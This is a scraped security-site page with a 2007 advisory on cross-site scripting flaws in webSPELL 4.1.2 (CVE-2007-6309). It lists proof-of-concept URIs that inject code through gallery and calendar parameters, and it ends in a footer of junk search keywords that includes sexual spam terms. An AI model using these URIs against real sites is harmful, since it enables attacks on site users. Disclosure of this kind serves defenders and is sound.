exploits , vulnerabilities , articles , webSPELL Usergallery.PHP and Calendar.PHP Multiple Cross-Site Scripting Vulnerabilities

Title	webSPELL Usergallery.PHP and Calendar.PHP Multiple Cross-Site Scripting Vulnerabilities
Published	2007-12-10-12:00AM
Updated	2008-01-03-02:10PM
Class	Input Validation Error
CVE	CVE-2007-6309
Remote	Yes
Local	No
Credit	Brainhead is credited with the discovery of these vulnerabilities.
Vulnerable	webSPELL webSPELL 4.1.2
Not Vulnerable
Code	Attackers can exploit these issues by enticing an unsuspecting user to follow a malicious URI.The following proof-of-concept URIs are available:http://www.example.com/[PATH]/index.php?site=usergallery&action=upload&galleryID=">[your code] http://www.example.com/[PATH]/index.php?site=calendar&action=announce&upID=">[your code] http://www.example.com/[PATH]/index.php?site=calendar&action=announce&tag=">[your code] http://www.example.com/[PATH]/index.php?site=calendar&action=announce&month=">[your code] http://www.example.com/[PATH]/index.php?site=calendar&action=announce&userID=">[your code] http://www.example.com/[PATH]/index.php?site=calendar&action=announce&year=">[your code]
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-17 GNU Automake Insecure Directory Permissions Vulnerability
2009-12-17 Mozilla Firefox CVE-2009-3979 Multiple Remote Memory Corruption Vulnerabilities
2009-12-17 Mozilla Firefox CVE-2009-3981 Remote Memory Corruption Vulnerability
2009-12-17 Drupal Sections Module HTML Injection Vulnerability
2009-12-17 Mozilla Firefox and SeaMonkey Theora Video Library Remote Integer Overflow Vulnerability
2009-12-17 Mozilla Firefox and Sea Monkey Insecure Protocol Location Bar Spoofing Vulnerability
2009-12-17 Mozilla Firefox and Sea Monkey Content Injection Spoofing Vulnerability
2009-12-17 Mozilla Firefox/SeaMonkey GeckoActiveXObject Exception Message COM Object Enumeration Vulnerability
2009-12-16 ZABBIX Denial Of Service and SQL Injection Vulnerabilities
2009-12-16 IBM WebSphere Application Server JNDI Remote Information Disclosure Vulnerability

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 18:26:24 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
googlesexx ms05051 solpot cat /home/ free vieo looking a news for c IceWarp We sexool.com www.sex.20 Based%252B Free.meena maxcpm.inf aish nude WWW.Indian Free.meena W.w.w.xxxm 17gu.com chatma winsrc.dll nescafe.co php-nuke 2 wapforsex. WWW.Sex 30 Pleasopen FormMail Www.sex po sex vdio Kerala sex Google Ear PH PROXY.h smartm www.erotic www.acaibe animal and i...to/idf PDG Shoppi xianhaojie LMS african gi WWW.Sex 30 THRISHA B. animal and Oracle Ora www.bigbla 2.6.11 OpenSSH 3. forumKIT 1 Www.Sexfar ip board 2